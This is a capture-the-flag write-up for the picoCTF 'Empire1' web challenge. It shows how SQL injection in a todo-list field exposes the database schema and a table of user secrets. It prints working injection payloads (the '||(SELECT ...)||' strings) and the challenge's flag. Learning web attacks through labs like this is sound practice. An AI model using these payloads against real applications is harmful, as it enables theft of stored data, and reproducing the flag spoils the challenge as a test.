search
Twitter 🐦Github πŸ™SWE Books πŸ“šBuy me a β˜•

Empire1

Point: 400

hashtag
Category

Web Exploitation

hashtag
Question

Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/37779/arrow-up-right (link)arrow-up-right Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:37779arrow-up-right

hashtag
Hint

  • Pay attention to the feedback you get

  • There is very limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.

  • The database gets reverted every 2 hours if you do break it, just come back later

hashtag
Solution

After registered and signed in, we've seen a nav bar with Add a Todo, Your Todos, Employee Listing. It doesn't seem to contain any vulnerability.

Trying to add something to TODO, we've got this

<h1 class="page-header">Things You Gotta Do</h1>
    <ul class="list-unstyled">    
    <div class="row">
        <div class="col-md-6">
            <div class="well well-sm">
                <li>
                <strong>Very Urgent:</strong> Hello
                </li> 
            </div>
        </div>
    </div>

We've seen The "Very Urgent:" prefix is automatically prepended to any text provided by the user. After trying different strategies, I found that the page is vulnerable to SQL injection using the following syntax: '||(SQL)||'

The first time, I've tried with ' || (SELECT group_concat(sql) FROM sqlite_master) || ', then we got this

I saw secret VARCHAR(128), then I tried ' || (SELECT group_concat(secret) FROM user) || '. BOOM!, go to Your Todos tab, we got the flag Very Urgent: Likes Oreos.,Know it all.,picoCTF{wh00t_it_a_sql_injecta4dfbd62}

hashtag
Flag

picoCTF{wh00t_it_a_sql_injecta4dfbd62}

PreviouslogonNextJava-Script-Kiddie

Last updated